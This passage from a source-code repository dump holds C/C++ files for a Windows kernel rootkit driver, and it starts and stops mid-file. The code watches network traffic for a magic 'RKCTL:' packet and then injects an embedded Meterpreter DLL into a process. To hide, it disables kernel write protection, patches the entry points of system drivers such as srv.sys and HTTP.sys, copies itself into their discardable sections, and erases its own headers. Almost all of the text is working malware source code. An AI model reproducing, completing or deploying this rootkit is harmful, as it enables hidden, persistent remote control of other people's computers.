ULONG Sum = Seed; while (Count > 1) { Sum += *(PUSHORT)Data; Count -= 2; Data = (PVOID)((PUCHAR)Data + 2); } /* Add left-over byte, if any */ if (Count > 0) { Sum += *(PUCHAR)Data; } return Sum; } USHORT Checksum(PVOID Data, int Count) { ULONG Sum = ChecksumCompute(Data, Count, 0); return ChecksumEnd(Sum); } //-------------------------------------------------------------------------------------- char *inet_ntoa(ULONG Addr) { static char buff[4 * sizeof("123")]; PUCHAR ucp = (PUCHAR)&Addr; sprintf(buff, "%d.%d.%d.%d", ucp[0] & 0xff, ucp[1] & 0xff, ucp[2] & 0xff, ucp[3] & 0xff); return buff; } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_driver/network.h ================================================ #define NET_MAC_ADDR_LEN 6 #include typedef struct _NET_ETH_HEADER { UCHAR Dst[NET_MAC_ADDR_LEN]; UCHAR Src[NET_MAC_ADDR_LEN]; USHORT Type; } NET_ETH_HEADER, *PNET_ETH_HEADER; #include #define ETH_P_IP 0x0800 /* Internet Protocol packet */ #define ETH_P_ARP 0x0806 /* Address Resolution packet */ #define ETH_IS_BCAST_ADDR(Addr) \ \ (((Addr)[0] == 0xff) && ((Addr)[1] == 0xff) && \ ((Addr)[2] == 0xff) && ((Addr)[3] == 0xff) && \ ((Addr)[4] == 0xff) && ((Addr)[5] == 0xff)) #define ETH_MATCH_ADDR(Addr1, Addr2) \ \ (((Addr1)[0] == (Addr2)[0]) && ((Addr1)[1] == (Addr2)[1]) && \ ((Addr1)[2] == (Addr2)[2]) && ((Addr1)[3] == (Addr2)[3]) && \ ((Addr1)[4] == (Addr2)[4]) && ((Addr1)[5] == (Addr2)[5])) /* Standard well-defined IP protocols. */ enum { IPPROTO_IP = 0, /* Dummy protocol for TCP */ IPPROTO_ICMP = 1, /* Internet Control Message Protocol */ IPPROTO_IGMP = 2, /* Internet Group Management Protocol */ IPPROTO_TCP = 6, /* Transmission Control Protocol */ IPPROTO_UDP = 17, /* User Datagram Protocol */ IPPROTO_SCTP = 132, /* Stream Control Transport Protocol */ IPPROTO_RAW = 255, /* Raw IP packets */ }; #include typedef struct _NET_IPv4_HEADER { UCHAR HeaderLength:4, Version:4; UCHAR TypeOfService; USHORT TotalLength; USHORT Id; USHORT FragmentOffset; UCHAR TimeToLive; UCHAR Protocol; USHORT Checksum; ULONG Src; ULONG Dst; } NET_IPv4_HEADER, *PNET_IPv4_HEADER; #include // unsigned long to TCP/IP network byte order #define HTONL(_a_) \ \ ((((_a_) & 0x000000FF) << 24) + \ (((_a_) & 0x0000FF00) << 8) + \ (((_a_) & 0x00FF0000) >> 8) + \ (((_a_) & 0xFF000000) >> 24)) // unsigned short to TCP/IP network byte order #define HTONS(_a_) \ \ (((0x00FF & (_a_)) << 8) + \ ((0xFF00 & (_a_)) >> 8)) SHORT ChecksumEnd(ULONG Sum); ULONG ChecksumCompute(PVOID Data, int Count, ULONG Seed); USHORT Checksum(PVOID Data, int Count); char *inet_ntoa(ULONG Addr); ================================================ FILE: src/rootkit_driver/post_build.bat ================================================ @echo off if exist ..\rootkit_driver_debug.sys ..\bin2c.exe ..\rootkit_driver_debug.sys rootkit_driver > ..\includes\rootkit_driver_debug.sys.h if exist ..\rootkit_driver.sys ..\bin2c.exe ..\rootkit_driver.sys rootkit_driver > ..\includes\rootkit_driver.sys.h pause ================================================ FILE: src/rootkit_driver/rootkit_driver.cpp ================================================ #include "stdafx.h" #pragma comment(linker,"/MERGE:.rdata=.text") #pragma comment(linker,"/MERGE:.edata=.text") #pragma section("INIT",read,write,execute) extern "C" { NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath); void HookImageEntry(PVOID Image); BOOLEAN CheckForFreeArea(PVOID Image, PULONG FreeAreaRVA, PULONG FreeAreaLength); VOID LoadImageNotify(PUNICODE_STRING FullImageName, HANDLE ProcessId, PIMAGE_INFO ImageInfo); VOID DriverEntryInitializePayload(PUCHAR PointerFixup); }; #pragma alloc_text(INIT, ClearWp) #pragma alloc_text(INIT, SetWp) #pragma alloc_text(INIT, NewDriverEntry) #pragma alloc_text(INIT, HookImageEntry) #pragma alloc_text(INIT, CheckForFreeArea) #pragma alloc_text(INIT, LoadImageNotify) #pragma alloc_text(INIT, DriverEntryInitializePayload) // user-mode DLL file #ifdef DBGMSG __declspec(allocate("INIT")) #include "../includes/meterpreter_debug.dll.h" #else __declspec(allocate("INIT")) #include "../includes/meterpreter.dll.h" #endif // defined in runtime.cpp extern PVOID m_DriverBase; ULONG m_DriverSize = 0; BOOLEAN m_bDriverMustBeFreed = FALSE; ULONG m_RkOffset = 0, m_RkSize = 0; PVOID m_FreeAreaFound = NULL; #define EP_PATCH_SIZE 6 UCHAR m_EpOriginalBytes[EP_PATCH_SIZE]; DRIVER_INITIALIZE *m_HookedEntry = NULL; PVOID m_Payload = NULL; ULONG m_PayloadSize = 0; //-------------------------------------------------------------------------------------- VOID InjectPayloadThread(PVOID Param) { if (m_Payload && m_PayloadSize > 0) { // inject user mode payload into the process InjectIntoProcessByName(METERPRETER_PROCESS, m_Payload, m_PayloadSize); } } //-------------------------------------------------------------------------------------- void NTAPI NdisHookHandleBuffer(PVOID MiniportHandle, PVOID Buffer, ULONG Size) { if (Size < sizeof(NET_ETH_HEADER) + sizeof(NET_IPv4_HEADER)) { // buffer is too small return; } // check the ethernet header PNET_ETH_HEADER Eth = (PNET_ETH_HEADER)Buffer; if (Eth->Type != HTONS(ETH_P_IP)) { // not a internet protocl packet return; } // check the IP header PNET_IPv4_HEADER Ip = (PNET_IPv4_HEADER)((PUCHAR)Eth + sizeof(NET_ETH_HEADER)); if (Ip->Version != 4 || Ip->HeaderLength * 4 != sizeof(NET_IPv4_HEADER)) { // not a IPv4 packet return; } if (Ip->Protocol != IPPROTO_ICMP && Ip->Protocol != IPPROTO_IP && Ip->Protocol != IPPROTO_UDP) { // unknown protocol return; } if (HTONS(Ip->TotalLength) + sizeof(NET_ETH_HEADER) > Size) { // total length out of bounds return; } // remember and reset checksum USHORT Sum = Ip->Checksum; Ip->Checksum = 0; // validate checksum if (Sum != Checksum(Ip, sizeof(NET_IPv4_HEADER))) { return; } char Dst[16], Src[16]; strcpy(Dst, inet_ntoa(Ip->Dst)); strcpy(Src, inet_ntoa(Ip->Src)); DbgMsg( __FUNCTION__"() IP: From = %s, To = %s, Protocol = %d, Length = %d\n", Src, Dst, Ip->Protocol, HTONS(Ip->TotalLength) ); // find magic sequence in packet char *lpszMagic = "RKCTL:" ROOTKIT_CTL_KEY; for (ULONG i = 0; i < Size - strlen(lpszMagic); i++) { if (RtlCompareMemory((PUCHAR)Buffer + i, lpszMagic, strlen(lpszMagic)) == strlen(lpszMagic)) { DbgMsg(__FUNCTION__"(): Magic sequence has been find in network packet!\n"); // we are at DPC level: create thread for execution of process injection code HANDLE hThread = NULL; NTSTATUS ns = PsCreateSystemThread( &hThread, THREAD_ALL_ACCESS, NULL, NULL, NULL, InjectPayloadThread, NULL ); if (NT_SUCCESS(ns)) { ZwClose(hThread); } else { DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns); } break; } } } //-------------------------------------------------------------------------------------- VOID DriverEntryContinueThread(PVOID Param) { /** * Hidden rootkit code starts execution here. */ LARGE_INTEGER Timeout = { 0 }; Timeout.QuadPart = TIME_RELATIVE(TIME_SECONDS(3)); DbgPrint(__FUNCTION__"(): Param = "IFMT"\n", Param); // initialize NDIS hook data handler NdisHookInitialize(NdisHookHandleBuffer); // initialize DLL injector InjectInitialize(); KeDelayExecutionThread(KernelMode, FALSE, &Timeout); if (Param) { // free memory, that has been allocated for driver ExFreePool(Param); } #ifndef USE_STEALTH_IMAGE if (m_DriverBase) { PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS) ((PUCHAR)m_DriverBase + ((PIMAGE_DOS_HEADER)m_DriverBase)->e_lfanew); // erase image headers RtlZeroMemory(m_DriverBase, pHeaders->OptionalHeader.SizeOfHeaders); } #endif // USE_STEALTH_IMAGE #ifdef USE_GREETING_MESSAGE while (true) { DbgPrint(__FUNCTION__"(): Commertial malware rootkits are sucks!\n"); // sleep KeDelayExecutionThread(KernelMode, FALSE, &Timeout); } #endif // USE_GREETING_MESSAGE } //-------------------------------------------------------------------------------------- void DriverEntryInitializePayload(PUCHAR PointerFixup) { /* Perform payload initialization here */ NdisHookSet(PointerFixup); // allocate memory for payload in non-paged pool ULONG PayloadSize = sizeof(dll); PVOID Payload = ExAllocatePool(NonPagedPool, PayloadSize); if (Payload) { RtlCopyMemory(Payload, dll, sizeof(dll)); PULONG pPayloadSize = (PULONG)RECALCULATE_POINTER(&m_PayloadSize); PVOID *pPayload = (PVOID *)RECALCULATE_POINTER(&m_Payload); *pPayloadSize = PayloadSize; *pPayload = Payload; } else { DbgMsg("ExAllocatePool() fails\n"); } } //-------------------------------------------------------------------------------------- #ifdef _X86_ //-------------------------------------------------------------------------------------- void ClearWp(void) { // allow to execute the code only on the 1-st CPU KeSetSystemAffinityThread(0x00000001); __asm { mov eax, cr0 and eax, not 000010000h mov cr0, eax } } void SetWp(void) { __asm { mov eax, cr0 or eax, 000010000h mov cr0, eax } } //-------------------------------------------------------------------------------------- #endif // _X86_ //-------------------------------------------------------------------------------------- PVOID DoPointerFixup(PVOID Ptr, PUCHAR PointerFixup) { #ifdef USE_STEALTH_IMAGE if (m_DriverBase == NULL) { return Ptr; } return (PUCHAR)Ptr - (PUCHAR)m_DriverBase + PointerFixup; #else // USE_STEALTH_IMAGE return Ptr; #endif //USE_STEALTH_IMAGE } //-------------------------------------------------------------------------------------- NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { // disable memory write protection ClearWp(); // restore original code from image entry point memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE); // enable memory write protection SetWp(); NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath); DbgMsg(__FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns); if (PsRemoveLoadImageNotifyRoutine(LoadImageNotify) == STATUS_SUCCESS) { m_bDriverMustBeFreed = TRUE; } if (NT_SUCCESS(ns)) { PVOID Image = ExAllocatePool(NonPagedPool, m_DriverSize); if (Image) { // prepare rootkit code for injection into the discardable sections memcpy(Image, m_DriverBase, m_DriverSize); RuntimeProcessRelocs(Image, (PVOID)((PUCHAR)m_FreeAreaFound - m_RkOffset)); // disable memory write protection ClearWp(); memcpy(m_FreeAreaFound, RVATOVA(Image, m_RkOffset), m_RkSize); // enable memory write protection SetWp(); PUCHAR PointerFixup = (PUCHAR)m_FreeAreaFound - m_RkOffset; // set up NDIS hooks DriverEntryInitializePayload(PointerFixup); PKSTART_ROUTINE Start = (PKSTART_ROUTINE)RECALCULATE_POINTER(DriverEntryContinueThread); DbgMsg(__FUNCTION__"(): Start address: "IFMT"\n", Start); // create thread for execution copied code HANDLE hThread = NULL; ns = PsCreateSystemThread( &hThread, THREAD_ALL_ACCESS, NULL, NULL, NULL, Start, m_bDriverMustBeFreed ? m_DriverBase : NULL ); if (NT_SUCCESS(ns)) { ZwClose(hThread); } else { DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns); } ExFreePool(Image); } // don't allow to unload target driver DriverObject->DriverUnload = NULL; } return ns; } //-------------------------------------------------------------------------------------- void HookImageEntry(PVOID Image) { PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); PUCHAR Entry = (PUCHAR)RVATOVA(Image, pHeaders->OptionalHeader.AddressOfEntryPoint); // save original code from image entry point memcpy(m_EpOriginalBytes, Entry, EP_PATCH_SIZE); m_HookedEntry = (DRIVER_INITIALIZE *)Entry; // disable memory write protection ClearWp(); #ifdef _X86_ // patch image entry point *(PUCHAR)(Entry + 0) = 0x68; *(PVOID*)(Entry + 1) = NewDriverEntry; *(PUCHAR)(Entry + 5) = 0xC3; #else // _X86_ #error __FUNCTION__ is x86 only #endif // _X86_ // enable memory write protection SetWp(); DbgMsg( __FUNCTION__"(): Image entry point hooked ("IFMT" -> "IFMT")\n", Entry, NewDriverEntry ); } //-------------------------------------------------------------------------------------- BOOLEAN CheckForFreeArea(PVOID Image, PULONG FreeAreaRVA, PULONG FreeAreaLength) { *FreeAreaRVA = NULL; *FreeAreaLength = 0; PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER) (pHeaders->FileHeader.SizeOfOptionalHeader + (PUCHAR)&pHeaders->OptionalHeader); ULONG AreaRVA = NULL; ULONG AreaLength = 0; // enumerate image sections for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++) { PVOID SectionVa = RVATOVA(Image, pSection->VirtualAddress); char szSectionName[IMAGE_SIZEOF_SHORT_NAME + 1]; // check for discardable attribute if ((pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE) && my_strcmp(szSectionName, "INIT")) { if (AreaRVA && pSection->VirtualAddress == AreaRVA + AreaLength) { // concatenate with the previously found section AreaLength += MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment); } else { AreaRVA = pSection->VirtualAddress; AreaLength = MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment); } } pSection += 1; } if (AreaLength >= m_RkSize) { DbgMsg("%d free bytes at 0x%.8x\n", AreaLength, AreaRVA); *FreeAreaRVA = AreaRVA; *FreeAreaLength = AreaLength; pSection = (PIMAGE_SECTION_HEADER) (pHeaders->FileHeader.SizeOfOptionalHeader + (PUCHAR)&pHeaders->OptionalHeader); // erase discardable flag for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++) { pSection->Characteristics &= ~IMAGE_SCN_MEM_DISCARDABLE; pSection += 1; } return TRUE; } return FALSE; } //-------------------------------------------------------------------------------------- /* kd> kb ChildEBP RetAddr Args to Child f8afdaa8 805c62ae f8afdcf0 00000000 f8afdb44 DrvHide!LoadImageNotify+0x10 f8afdac8 805a4159 f8afdcf0 00000000 f8afdb44 nt!PsCallImageNotifyRoutines+0x36 f8afdc6c 80576483 f8afdcf0 00000000 00000000 nt!MmLoadSystemImage+0x9e5 f8afdd4c 8057688f 80000378 00000001 00000000 nt!IopLoadDriver+0x371 f8afdd74 80534c02 80000378 00000000 823c63c8 nt!IopLoadUnloadDriver+0x45 f8afddac 805c6160 b286ecf4 00000000 00000000 nt!ExpWorkerThread+0x100 f8afdddc 80541dd2 80534b02 00000001 00000000 nt!PspSystemThreadStartup+0x34 00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16 */ // images for storing malicious code PWSTR m_Images[] = { L"\\HTTP.sys", L"\\mrxsmb.sys", L"\\mrxsmb10.sys", L"\\mrxsmb20.sys", L"\\srv.sys", L"\\srv2.sys", L"\\secdrv.sys" }; VOID LoadImageNotify( PUNICODE_STRING FullImageName, HANDLE ProcessId, // where image is mapped PIMAGE_INFO ImageInfo) { if (m_FreeAreaFound) { return; } // check for kernel driver if (ProcessId == 0 && ImageInfo->SystemModeImage) { BOOLEAN bImageFound = FALSE; PVOID TargetImageBase = ImageInfo->ImageBase; ULONG TargetImageSize = ImageInfo->ImageSize; DbgMsg( __FUNCTION__"(): '%wZ' is at "IFMT", size=%d\n", FullImageName, TargetImageBase, TargetImageSize ); // check for the known image for (ULONG i = 0; i < sizeof(m_Images) / sizeof(PWSTR); i++) { UNICODE_STRING usName; RtlInitUnicodeString(&usName, m_Images[i]); if (EqualUnicodeString_r(FullImageName, &usName, TRUE)) { bImageFound = TRUE; break; } } if (bImageFound) { // check for the free space in image discardable sections ULONG FreeAreaRVA = 0, FreeAreaLength = 0; if (CheckForFreeArea(TargetImageBase, &FreeAreaRVA, &FreeAreaLength)) { // copy malicious code into this image m_FreeAreaFound = RVATOVA(TargetImageBase, FreeAreaRVA); HookImageEntry(TargetImageBase); } } } } //-------------------------------------------------------------------------------------- NTSTATUS NTAPI DriverEntry( PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { if (!RuntimeInitialize(DriverObject, RegistryPath)) { return STATUS_UNSUCCESSFUL; } DbgMsg(__FUNCTION__"(): Loaded at "IFMT"\n", m_DriverBase); // initialize NDIS structures offsets NdisHookInitialize(NULL); #ifdef USE_STEALTH_IMAGE if (m_DriverBase == NULL) { return STATUS_UNSUCCESSFUL; } PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)((PUCHAR)m_DriverBase + ((PIMAGE_DOS_HEADER)m_DriverBase)->e_lfanew); PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER) (pHeaders->FileHeader.SizeOfOptionalHeader + (PUCHAR)&pHeaders->OptionalHeader); // calculate size, that require for rootkit code for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++) { if (m_RkOffset == 0) { m_RkOffset = pSection->VirtualAddress; } if (pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE) { // erase discardable flag from our driver sections pSection->Characteristics &= ~IMAGE_SCN_MEM_DISCARDABLE; } else { m_RkSize += MY_ALIGN_UP( pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment ); } pSection += 1; } DbgMsg("Rootkit code: 0x%x bytes from 0x%.8x\n", m_RkSize, m_RkOffset); // to deal with ProcessRelocs() pHeaders->OptionalHeader.ImageBase = (ULONG)m_DriverBase; m_DriverSize = pHeaders->OptionalHeader.SizeOfImage; NTSTATUS ns = PsSetLoadImageNotifyRoutine(LoadImageNotify); if (!NT_SUCCESS(ns)) { DbgMsg("PsSetLoadImageNotifyRoutine() fails: 0x%.8x\n", ns); } #else // USE_STEALTH_IMAGE DriverEntryInitializePayload(NULL); HANDLE hThread = NULL; NTSTATUS ns = PsCreateSystemThread( &hThread, THREAD_ALL_ACCESS, NULL, NULL, NULL, DriverEntryContinueThread, NULL ); if (NT_SUCCESS(ns)) { ZwClose(hThread); } else { DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns); } #endif // USE_STEALTH_IMAGE return STATUS_SUCCESS; } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_driver/rootkit_driver.def ================================================ ================================================ FILE: src/rootkit_driver/rootkit_driver.h ================================================ extern "C" { void ClearWp(void); void SetWp(void); PVOID DoPointerFixup(PVOID Ptr, PUCHAR PointerFixup); } #define RECALCULATE_POINTER(_ptr_) DoPointerFixup((PVOID)(_ptr_), PointerFixup) ================================================ FILE: src/rootkit_driver/rootkit_driver.vcproj ================================================ ================================================ FILE: src/rootkit_driver/runtime.cpp ================================================ #include "stdafx.h" #include "../common/shellcode2_struct.h" #pragma alloc_text(INIT, my_strlen) #pragma alloc_text(INIT, my_strcmp) #pragma alloc_text(INIT, my_strcpy) #pragma alloc_text(INIT, my_strlwr) #pragma alloc_text(INIT, chrlwr_w) #pragma alloc_text(INIT, EqualUnicodeString_r) #pragma alloc_text(INIT, RuntimeGetExportAddress) #pragma alloc_text(INIT, RuntimeGetKernelModuleBase) #pragma alloc_text(INIT, RuntimeProcessImports) #pragma alloc_text(INIT, RuntimeInitialize) #define MAX_IMAGE_NAME_LEN 255 PVOID m_KernelBase = NULL, m_DriverBase = NULL; //-------------------------------------------------------------------------------------- /** * Implementations of some standard C library functions. */ size_t my_strlen(const char *str) { if (str) { size_t i = 0; for (; str[i] != NULL; i++); return i; } return 0; } int my_strcmp(const char *str_1, const char *str_2) { size_t len_1 = my_strlen(str_1), len_2 = my_strlen(str_2); if (len_1 != len_2) { return 1; } for (size_t i = 0; i < len_1; i++) { if (str_1[i] != str_2[i]) { return 1; } } return 0; } char *my_strcpy(char *str_1, const char *str_2) { size_t len = my_strlen(str_2) + 1; for (size_t i = 0; i < len; i++) { str_1[i] = str_2[i]; } return str_1; } char *my_strlwr(char *str) { char *pos = str; for (; str <= (pos + my_strlen(pos)); str++) { if ((*str >= 'A') && (*str <= 'Z')) { *str = *str + ('a'-'A'); } } return pos; } //-------------------------------------------------------------------------------------- wchar_t chrlwr_w(wchar_t chr) { if ((chr >= 'A') && (chr <= 'Z')) { return chr + ('a'-'A'); } return chr; } BOOLEAN EqualUnicodeString_r(PUNICODE_STRING Str1, PUNICODE_STRING Str2, BOOLEAN CaseInSensitive) { USHORT CmpLen = min(Str1->Length, Str2->Length) / sizeof(WCHAR); // compare unicode strings from the end of the buffers for (USHORT i = 1; i < CmpLen; i++) { WCHAR Chr1 = Str1->Buffer[Str1->Length / sizeof(WCHAR) - i], Chr2 = Str2->Buffer[Str2->Length / sizeof(WCHAR) - i]; if (CaseInSensitive) { Chr1 = chrlwr_w(Chr1); Chr2 = chrlwr_w(Chr2); } if (Chr1 != Chr2) { return FALSE; } } return TRUE; } //-------------------------------------------------------------------------------------- PVOID RuntimeGetExportAddress(PVOID Image, char *lpszFunctionName) { PIMAGE_EXPORT_DIRECTORY pExport = NULL; PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) { // 32-bit image if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) { pExport = (PIMAGE_EXPORT_DIRECTORY)RVATOVA(Image, pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); } } else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) { // 64-bit image PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) { pExport = (PIMAGE_EXPORT_DIRECTORY)RVATOVA(Image, pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); } } else { return NULL; } if (pExport) { PULONG AddressOfFunctions = (PULONG)RVATOVA(Image, pExport->AddressOfFunctions); PSHORT AddrOfOrdinals = (PSHORT)RVATOVA(Image, pExport->AddressOfNameOrdinals); PULONG AddressOfNames = (PULONG)RVATOVA(Image, pExport->AddressOfNames); // enumerate exports for (ULONG i = 0; i < pExport->NumberOfFunctions; i++) { if (!my_strcmp((char *)RVATOVA(Image, AddressOfNames[i]), lpszFunctionName)) { return RVATOVA(Image, AddressOfFunctions[AddrOfOrdinals[i]]); } } } return NULL; } //-------------------------------------------------------------------------------------- BOOLEAN RuntimeProcessImports(PVOID Image, char *ImportedModuleName, PVOID ImportedModuleBase) { PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); PIMAGE_IMPORT_DESCRIPTOR pImport = NULL; if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) { // 32-bit image if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress) { pImport = (PIMAGE_IMPORT_DESCRIPTOR)RVATOVA(Image, pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); } } else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) { // 64-bit image PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress) { pImport = (PIMAGE_IMPORT_DESCRIPTOR)RVATOVA(Image, pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); } } else { return FALSE; } if (pImport) { // enumerate import modules while (pImport->Name != 0) { char szName[MAX_IMAGE_NAME_LEN]; my_strcpy(szName, (char *)RVATOVA(Image, pImport->Name)); if (my_strcmp(my_strlwr(szName), ImportedModuleName)) { // this routine can process only exports from the specified module goto skip_module; } #ifdef _X86_ // process thunk data for 32-bit pointers PIMAGE_THUNK_DATA32 pThunk = (PIMAGE_THUNK_DATA32)RVATOVA(Image, pImport->FirstThunk); #elif _AMD64_ // process thunk data for 64-bit pointers PIMAGE_THUNK_DATA64 pThunk = (PIMAGE_THUNK_DATA64)RVATOVA(Image, pImport->FirstThunk); #endif // enumerate functions of the current module while (pThunk->u1.Ordinal != 0) { PIMAGE_IMPORT_BY_NAME pName = (PIMAGE_IMPORT_BY_NAME)RVATOVA(Image, pThunk->u1.AddressOfData); char *lpszFuncName = (char *)&pName->Name; PVOID FuncAddr = RuntimeGetExportAddress(ImportedModuleBase, lpszFuncName); if (FuncAddr == NULL) { return FALSE; } *(PVOID *)pThunk = FuncAddr; pThunk += 1; } skip_module: pImport += 1; } } return TRUE; } //-------------------------------------------------------------------------------------- BOOLEAN RuntimeProcessRelocs(PVOID Image, PVOID NewBase) { PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); PIMAGE_BASE_RELOCATION pRelocation = NULL; ULONG RelocationSize = 0; ULONGLONG OldBase = 0; if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) { // 32-bit image if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) { pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(Image, pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); RelocationSize = pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; } OldBase = pHeaders32->OptionalHeader.ImageBase; } else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) { // 64-bit image PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) { pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(Image, pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); RelocationSize = pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; } OldBase = pHeaders64->OptionalHeader.ImageBase; } else { return FALSE; } if (pRelocation) { ULONG Size = 0; // enumerate relocation pages while (RelocationSize > Size && pRelocation->SizeOfBlock) { ULONG Number = (pRelocation->SizeOfBlock - 8) / 2; PUSHORT Rel = (PUSHORT)((PUCHAR)pRelocation + 8); // enumerate relocation offsets for the current page for (ULONG i = 0; i < Number; i++) { if (Rel[i] > 0) { USHORT Type = (Rel[i] & 0xF000) >> 12; // check for supporting type if (Type != IMAGE_REL_BASED_HIGHLOW && Type != IMAGE_REL_BASED_DIR64) { return FALSE; } #ifdef _X86_ *(PULONG)(RVATOVA(Image, pRelocation->VirtualAddress + (Rel[i] & 0x0FFF))) += (ULONG)((ULONGLONG)NewBase - OldBase); #elif _AMD64_ *(PULONGLONG)(RVATOVA(Image, pRelocation->VirtualAddress + (Rel[i] & 0x0FFF))) += (ULONGLONG)NewBase - OldBase; #endif } } pRelocation = (PIMAGE_BASE_RELOCATION)((PUCHAR)pRelocation + pRelocation->SizeOfBlock); Size += pRelocation->SizeOfBlock; } } return TRUE; } //-------------------------------------------------------------------------------------- PVOID RuntimeGetSystemInformation(SYSTEM_INFORMATION_CLASS InfoClass) { NTSTATUS ns = STATUS_SUCCESS; ULONG Size = 0x100; PVOID Info = NULL; while (true) { // allocate memory for the system information if ((Info = ExAllocatePool(NonPagedPool, Size)) == NULL) { DbgMsg("ExAllocatePool() fails\n"); return NULL; } ULONG RetSize = 0; ns = ZwQuerySystemInformation(InfoClass, Info, Size, &RetSize); if (ns == STATUS_INFO_LENGTH_MISMATCH) { ExFreePool(Info); Info = NULL; if (RetSize > 0) { // need more memory Size = RetSize + 0x100; } else { break; } } else { break; } } if (!NT_SUCCESS(ns)) { DbgMsg("ZwQuerySystemInformation() fails; status: 0x%.8x\n", ns); if (Info) { // cleanup on error ExFreePool(Info); } return NULL; } return Info; } //-------------------------------------------------------------------------------------- PVOID RuntimeGetKernelModuleBase(char *ModuleName) { PVOID pModuleBase = NULL; UNICODE_STRING usCommonHalName, usCommonNtName; RtlInitUnicodeString(&usCommonHalName, L"hal.dll"); RtlInitUnicodeString(&usCommonNtName, L"ntoskrnl.exe"); #define HAL_NAMES_NUM 6 wchar_t *wcHalNames[] = { L"hal.dll", // Non-ACPI PIC HAL L"halacpi.dll", // ACPI PIC HAL L"halapic.dll", // Non-ACPI APIC UP HAL L"halmps.dll", // Non-ACPI APIC MP HAL L"halaacpi.dll", // ACPI APIC UP HAL L"halmacpi.dll" // ACPI APIC MP HAL }; #define NT_NAMES_NUM 4 wchar_t *wcNtNames[] = { L"ntoskrnl.exe", // UP L"ntkrnlpa.exe", // UP PAE L"ntkrnlmp.exe", // MP L"ntkrpamp.exe" // MP PAE }; PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)RuntimeGetSystemInformation(SystemModuleInformation); if (Info) { ANSI_STRING 